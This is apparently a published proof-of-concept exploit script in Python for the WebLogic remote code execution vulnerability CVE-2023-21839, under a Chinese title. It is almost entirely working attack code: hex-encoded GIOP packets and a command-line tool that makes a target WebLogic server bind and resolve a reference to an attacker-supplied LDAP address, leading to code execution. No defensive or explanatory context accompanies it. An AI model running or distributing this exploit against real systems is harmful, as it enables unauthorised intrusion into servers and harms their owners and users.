Weblogic远程代码执行漏洞（CVE-2023-21839）

# -*- encoding: utf-8 -*- import socket import argparse class POC: def __init__(self, target, port, ldap): self.target = target self.port = port self.timeout = 5 self.ldap = ldap def verify(self): vp = "743320392e322e302e300a41533a3235350a484c3a39320a4d5" \ "33a31303030303030300a50553a74333a2f2f746573743a373030310a0a" print("[*] ip :",self.target) print("[*] port :",self.port) print("[*] ldap :",self.ldap) ver = getVer(self.target, self.port, bytes.fromhex(vp)) wlsKey1 = None wlsKey2 = None if ver == '12': wlsKey1 = "00424541080103000000000c41646d696e53657276657200000000000000003349" \ "444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e6743" \ "6f6e74657874416e793a312e3000000000000238000000000000014245412c0000001000" \ "00000000000000{{key1}}" wlsKey2 = "00424541080103000000000c41646d696e53657276657200000000000000003349" \ "444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e6743" \ "6f6e74657874416e793a312e30000000000004{{key3}}000000014245412c0000001000" \ "00000000000000{{key1}}" elif ver == '14': wlsKey1 = "00424541080103000000000c41646" \ "d696e53657276657200000000000000003349444c3a7765626c" \ "6f6769632f636f7262612f636f732f6e616d696e672f4e616d6" \ "96e67436f6e74657874416e793a312e30000000000002380000" \ "00000000014245412e000000100000000000000000{{key1}}" wlsKey2 = "00424541080103000000000c41646d696e53657276657" \ "200000000000000003349444c3a7765626c6f6769632f636f72" \ "62612f636f732f6e616d696e672f4e616d696e67436f6e74657" \ "874416e793a312e30000000000004{{key3}}00000001424541" \ "2e000000100000000000000000{{key1}}" else: print("[*] ",'版本不符合影响范围') return try: ldap = str(hex(len(self.ldap)))[2:] + self.ldap.encode().hex() print("[*] version: " ,ver) soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.settimeout(self.timeout) soc.connect((self.target, int(self.port))) str2 = "47494f50010200030000001700000002000000000000000b4e616d6553657276696365" soc.send(bytes.fromhex(str2)) buf = soc.recv(1024) print("[*] 2 ", 'locateRequest') ioff = 0x60 while True: if buf[ioff] != 0x00: ioff = ioff + 0x01 else: break if ioff > 1024 * 10: return while True: if buf[ioff] == 0x00: ioff = ioff + 0x01 else: break p = [] p.append(buf[ioff]) ioff = ioff + 0x01 p.append(buf[ioff]) tmport = int(p[1]) | int(p[0]) << 8 if tmport != int(self.port): return lt = ioff - 0x60 foff = 0x60 + lt + 0x75 while True: if buf[foff] == 0x0: foff = foff + 0x01 else: break key1 = buf[foff:foff + 8].hex() key2 = (b'\xff\xff\xff\xff' + buf[foff + 4:foff + 8]).hex() wlsKey1 = wlsKey1.replace("{{key1}}",key1) str3_request = "00000003030000000000000000000078"+wlsKey1+"0000000b726562696e645f616e79000000000006000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000100000006000000f4000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000100000000000000b8000102000000000d3137322e32362e3131322e310000ec5b0000006400424541080103000000000100000000000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000331320000000000014245412a0000001000000000000000005eedafdebc0d227000000001000000010000002c00000000000100200000000300010020000100010501000100010100000000030001010000010109050100010000000f00000020000000000000000000000000000000010000000000000000010000000000000042454103000000140000000000000000"+key2+"000000004245410000000004000a03010000000000000001000000047465737400000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e696e7465726e616c2e466f726569676e4f70617175655265666572656e63653a443233374439314342324630463638413a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000000000"+ldap str_size = str(hex(int(len(str3_request)/2))).replace("0x","") while len(str_size) != 8: str_size = "0"+str_size str3_header = "47494f5001020000"+str_size str3 = str3_header+str3_request soc.send(bytes.fromhex(str3)) buf = soc.recv(1024) print("[*] 3 ", 'rebindAny') startoff = 0x64 + lt + 0xc0 + len(self.target) + 0xac + lt + 0x5d while buf[startoff] != 0x32: if startoff > 0x2710: break startoff = startoff + 0x01 if startoff > 0x2710: key3 = b'\x32\x38\x39\x00'.hex() else: key3 = buf[startoff : startoff+4].hex() wlsKey2 = wlsKey2.replace("{{key3}}",key3) wlsKey2 = wlsKey2.replace("{{key1}}",key1) str4_request = "00000004030000000000000000000078"+wlsKey2+"0000000b726562696e645f616e79000000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000"+key2+"000000004245410000000004000a030100000001000000047465737400000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e696e7465726e616c2e466f726569676e4f70617175655265666572656e63653a443233374439314342324630463638413a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000000000"+ldap str_size = str(hex(int(len(str4_request) / 2))).replace("0x", "") while len(str_size) != 8: str_size = "0"+str_size str4_header = "47494f5001020000"+str_size str4 = str4_header+str4_request soc.send(bytes.fromhex(str4)) buf = soc.recv(1024) print("[*] 4 ",'rebindAny') str5 = "47494f50010200030000001700000005000000000000000b4e616d6553657276696365" soc.send(bytes.fromhex(str5)) buf = soc.recv(1024) print("[*] 5 ",'locateRequest') str6 = "47494f50010200000000011100000006030000000000000000000078"+wlsKey1+"000000087265736f6c76650000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000"+key2+"000000004245410000000004000a030100000000000000010000000574657374000000000000000100" soc.send(bytes.fromhex(str6)) buf = soc.recv(1024) print("[*] 6 ",'resolve') str7 = "47494f50010200000000011100000007030000000000000000000078"+wlsKey2+"000000087265736f6c76650000000004000000050000001c00000000000000010000000d3137322e32362e3131322e310000ec5b000000010000000c00000000000100200501000142454103000000140000000000000000"+key2+"000000004245410000000004000a030100000000000000010000000574657374000000000000000100" soc.send(bytes.fromhex(str7)) buf = soc.recv(1024) print("[*] 7 ",'resolve') except Exception as e: print("[-] ","run error: ",e) finally: if soc: soc.close() def getVer(host, port, vp): soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.settimeout(5) soc.connect((host, int(port))) try: soc.send(vp) buf = soc.recv(1024) ver = buf[5:7] if ver[0] == 0x00 or ver[1] == 0x00: return "" return bytes.decode(ver) except: pass finally: if soc: soc.close() if __name__ == "__main__": banner = ''' ___ __ ____ ___ ____ _____ ____ _ ___ _____ ___ / __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \ / / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) | / /___ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, | \____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/ ''' print(banner) parser = argparse.ArgumentParser(description="Please enter parameters") parser.add_argument('-ip','--ip',type=str,metavar='',help='target ip') parser.add_argument('-p','--port',type=str,metavar='', default = '7001' , help='target port') parser.add_argument('-l','--ldap',type=str,metavar='',help='ldap') args = parser.parse_args() if args.ip is None or args.port is None: parser.usage POC(args.ip, args.port, args.ldap).verify()